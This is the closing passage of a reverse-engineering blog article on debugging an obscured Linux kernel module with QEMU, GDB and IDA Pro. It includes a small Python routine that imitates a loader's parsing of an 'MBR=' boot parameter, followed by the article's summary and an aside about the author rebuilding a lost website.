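MBR_PATTERN = re.compile(r"MBR=(?:0[xX])?([0-9a-fA-F]+)")


def parse_mbr(cmdline: str) -> Optional[int]:
    """Approximate strstr(buf, "MBR=") followed by sscanf(p, "MBR=%x", &value)."""
    start = cmdline.find("MBR=")
    if start < 0:
        return None  # loader would call exit(1) here
    match = MBR_PATTERN.match(cmdline, start)
    if match is None:
        return None  # sscanf converted nothing, also exit(1)
    return int(match.group(1), 16)


print(parse_mbr("root=/dev/hda1 ro single\n"))        # None
print(parse_mbr("root=/dev/hda1 ro single MBR=0\n"))  # 0
```

The first call uses the command line from the strace output, which has no MBR= entry, which is consistent with the exit_group(1) seen there.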

Summary

This article has shown how to use QEMU with GDB to debug Linux kernel modules, alongside static disassembly provided by IDA Pro. It has covered analysing an obscured kernel module that was tightly bound to a specific vendor kernel.

Misc

A while ago I accidentally destroyed my previous website content. I've decided to make a new one up, and start afresh, rather than restoring the contents from cached copies.